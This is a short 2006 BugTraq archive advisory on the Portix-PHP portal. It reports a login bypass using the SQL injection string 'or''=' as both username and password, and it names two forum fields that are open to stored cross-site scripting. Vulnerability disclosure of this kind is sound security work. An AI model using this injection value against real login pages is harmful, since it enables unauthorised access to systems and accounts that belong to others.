BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Portix-PHP [login bypass & xss (post)] Nov 08 2006 06:17PM
saps audit gmail com
product:Portix-PHP
vendor site :http://portix2.be
risk : medium

log with :
username: 'or''='
passwd : 'or''='

xss post on the forum , vulnerable fields :
titre
auteur

laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]
...

[ more ]  
 

Privacy Statement
Copyright 2010, SecurityFocus